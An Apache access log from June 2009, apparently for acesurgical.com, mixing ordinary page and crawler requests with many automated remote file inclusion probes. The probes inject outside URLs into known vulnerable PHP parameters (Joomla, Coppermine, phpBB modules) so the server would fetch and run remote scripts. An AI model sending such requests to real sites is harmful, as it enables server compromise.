119.198.187.8 - - [08/Jun/2009:01:56:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322)"
119.198.187.8 - - [08/Jun/2009:01:56:42 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322)"
122.201.76.100 - - [08/Jun/2009:01:56:43 -0400] "GET /rfihttp://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:56:43 -0400] "GET /logs/rfihttp://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.811"
119.198.187.8 - - [08/Jun/2009:01:56:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322)"
119.198.187.8 - - [08/Jun/2009:01:56:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322)"
119.198.187.8 - - [08/Jun/2009:01:56:50 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322)"
119.198.187.8 - - [08/Jun/2009:01:56:50 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322)"
119.198.187.8 - - [08/Jun/2009:01:56:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322)"
119.198.187.8 - - [08/Jun/2009:01:56:54 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322)"
209.59.12.99 - - [08/Jun/2009:01:56:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.2 - - [08/Jun/2009:01:57:05 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:01:57:05 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:01:57:05 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
203.185.28.194 - - [08/Jun/2009:01:57:06 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
199.120.90.222 - - [08/Jun/2009:01:57:07 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
199.120.90.222 - - [08/Jun/2009:01:57:07 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
155.185.215.15 - - [08/Jun/2009:01:57:08 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
155.185.215.15 - - [08/Jun/2009:01:57:08 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
155.185.215.15 - - [08/Jun/2009:01:57:10 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
199.120.90.222 - - [08/Jun/2009:01:57:10 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
199.120.90.222 - - [08/Jun/2009:01:57:10 -0400] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
119.198.187.8 - - [08/Jun/2009:01:57:11 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322)"
119.198.187.8 - - [08/Jun/2009:01:57:11 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322)"
199.120.90.222 - - [08/Jun/2009:01:57:13 -0400] "GET /logs/access_log.Q109052200//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
199.120.90.222 - - [08/Jun/2009:01:57:13 -0400] "GET /logs/access_log.Q109052500//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
119.198.187.8 - - [08/Jun/2009:01:57:14 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322)"
119.198.187.8 - - [08/Jun/2009:01:57:14 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322)"
199.120.90.222 - - [08/Jun/2009:01:57:23 -0400] "GET /logs/access_log.Q109052200//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
199.120.90.222 - - [08/Jun/2009:01:57:24 -0400] "GET /logs/access_log.Q109052500//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:01:57:38 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:01:57:38 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:01:57:38 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
122.201.76.100 - - [08/Jun/2009:01:57:39 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
199.120.90.222 - - [08/Jun/2009:01:57:45 -0400] "GET /logs/access_log.Q109052200//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
199.120.90.222 - - [08/Jun/2009:01:57:50 -0400] "GET /logs/access_log.Q109052500//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
199.120.90.222 - - [08/Jun/2009:01:57:53 -0400] "GET /logs/access_log.Q109052200%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
199.120.90.222 - - [08/Jun/2009:01:57:53 -0400] "GET /logs/access_log.Q109052500%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:57:54 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:57:55 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:57:55 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
199.120.90.222 - - [08/Jun/2009:01:58:02 -0400] "GET /logs/access_log.Q109052200%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
199.120.90.222 - - [08/Jun/2009:01:58:02 -0400] "GET /logs/access_log.Q109052500%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:58:08 -0400] "GET /logs/access_log.Q109051100%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
203.185.28.194 - - [08/Jun/2009:01:58:11 -0400] "GET /logs/error_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://grupowh.com/sqli/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:01:58:14 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
155.185.215.15 - - [08/Jun/2009:01:58:15 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:01:58:23 -0400] "GET /logs/access_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:01:58:23 -0400] "GET /logs/access_log.Q109052100/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:01:58:23 -0400] "GET /logs/access_log.Q109052300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:01:58:33 -0400] "GET /logs/error_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
58.177.251.221 - - [08/Jun/2009:01:58:38 -0400] "GET /logs/access_log.Q109051600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:01:58:38 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:01:58:40 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:01:58:40 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:01:58:40 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:01:58:41 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
217.147.30.80 - - [08/Jun/2009:01:58:50 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.147.30.80 - - [08/Jun/2009:01:58:50 -0400] "GET /logs/access_log.Q109052200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
77.221.130.2 - - [08/Jun/2009:01:58:51 -0400] "GET /logs/error_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
122.201.76.100 - - [08/Jun/2009:01:58:55 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
195.34.78.110 - - [08/Jun/2009:02:00:31 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.34.78.110 - - [08/Jun/2009:02:00:44 -0400] "GET /logs/access_log.Q109052200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:02:01:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.172.33.230 - - [08/Jun/2009:02:02:03 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
119.93.90.155 - - [08/Jun/2009:02:02:07 -0400] "GET /logs/access_log.Q109051100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:02:02:37 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?str=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:02:42 -0400] "GET /logs//index.php?str=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.172.33.230 - - [08/Jun/2009:02:02:43 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:02:46 -0400] "GET //index.php?str=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.6.22.170 - - [08/Jun/2009:02:02:54 -0400] "GET /logs/ HTTP/1.0" 200 4634 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.250.85.200 - - [08/Jun/2009:02:03:01 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:02:03:01 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:02:03:01 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:02:03:05 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:03:05 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:03:06 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
87.106.67.146 - - [08/Jun/2009:02:03:08 -0400] "GET //index.php?str=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:03:08 -0400] "GET /logs//index.php?str=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.250.85.200 - - [08/Jun/2009:02:03:10 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://www.sandradeco.lv//assets/cache/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:03:13 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?str=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:02:03:18 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
77.221.130.2 - - [08/Jun/2009:02:03:55 -0400] "GET /logs/access_log.Q109051600%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
77.221.130.2 - - [08/Jun/2009:02:03:56 -0400] "GET /logs/access_log.Q109051600%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
119.93.90.155 - - [08/Jun/2009:02:04:38 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:02:05:24 -0400] "GET /logs/access_log.Q109050300//phpsecurityadmin/include/logout.php?PSA_PATH=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:02:05:24 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:02:05:25 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:02:05:25 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?str=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:05:30 -0400] "GET /logs//index.php?str=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:05:30 -0400] "GET //index.php?str=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.6.22.170 - - [08/Jun/2009:02:05:18 -0400] "GET /logs/access_log.Q109060600 HTTP/1.0" 200 2519002 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.146.39.200 - - [08/Jun/2009:02:05:43 -0400] "GET /logs/access_log.Q109052600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.822"
82.146.39.200 - - [08/Jun/2009:02:05:43 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.822"
82.146.39.200 - - [08/Jun/2009:02:05:43 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
66.249.71.14 - - [08/Jun/2009:02:05:58 -0400] "GET /logs/error_log.Q108100300 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.201.76.100 - - [08/Jun/2009:02:06:56 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:02:07:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.170 - - [08/Jun/2009:02:06:51 -0400] "GET /logs/access_log.Q109052900 HTTP/1.0" 200 4356729 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.165.73.157 - - [08/Jun/2009:02:07:17 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:02:07:18 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:02:07:18 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:02:07:19 -0400] "GET /logs/access_log.Q109050300%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:07:23 -0400] "GET /logs//index.php?str=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:02:07:23 -0400] "GET //index.php?str=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:02:07:23 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
87.106.67.146 - - [08/Jun/2009:02:07:23 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?str=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:02:07:23 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:07:25 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
74.6.22.170 - - [08/Jun/2009:02:07:45 -0400] "GET /logs/error_log.Q109060400 HTTP/1.0" 200 2511221 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.201.76.100 - - [08/Jun/2009:02:07:45 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.startenglish.com.br/id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
74.6.22.170 - - [08/Jun/2009:02:07:45 -0400] "GET /logs/error_log.Q109060400 HTTP/1.0" 200 2511221 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.106.67.146 - - [08/Jun/2009:02:08:10 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:02:08:13 -0400] "GET /logs/access_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:02:08:14 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:02:08:14 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:02:08:22 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
122.201.76.100 - - [08/Jun/2009:02:08:34 -0400] "GET /logs/access_log.Q109051600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
